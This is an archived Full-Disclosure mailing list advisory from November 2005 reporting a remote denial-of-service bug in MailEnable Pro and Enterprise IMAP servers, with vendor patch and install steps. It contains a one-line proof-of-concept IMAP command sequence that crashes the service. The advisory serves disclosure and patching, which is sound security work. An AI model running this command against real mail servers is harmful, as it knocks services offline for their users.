Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | [Full-disclosure] MailEnable IMAP DOS |
|---|---|
| Date: | Thu, 24 Nov 2005 08:54:33 -0500 (EST) |
Synopsis: MailEnable Imap Remote DOS.
Product: MailEnable Pro
MailEnable Enterprise
http://www.mailenable.comVersion: Confirmed on MailEnable Pro 1.7 and MailEnable Enterprise 1.1
Author: Josh Zlatin-Amishav
Date: November 24, 2005
PoC: telnet localhost 143 a1 login josh byebye a2 rename foo bar
where josh and byebye are the login credentials for an existing mailbox.
Vendor notified: November 24, 2005 10:50AM Patch released: November 24, 2005 13:28PM
Solution: Download patch from: http://www.mailenable.com/hotfix/MEIMAPS.ZIP
To install: 1) Stop the IMAP service 2) Rename the MEIMAPS.EXE file in the Mail Enable\bin directory as this will allow you to roll back this fix 3) Extract the zip file from the URL above to the Mail Enable\bin directory 4) Start the IMAP service
References: http://zur.homelinux.com/Advisories/MailEnableImapDos.txt _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | MDKSA-2005:215 - Updated binutils packages fix vulnerabilities, Mandriva Security Team |
|---|---|
| Next by Date: | [Full-disclosure] Advisory 23/2005: vTiger multiple vulnerabilities, Christopher Kunz |
| Previous by Thread: | MDKSA-2005:215 - Updated binutils packages fix vulnerabilities, Mandriva Security Team |
| Next by Thread: | [Full-disclosure] Advisory 23/2005: vTiger multiple vulnerabilities, Christopher Kunz |
| Indexes: | [Date] [Thread] [Top] [All Lists] |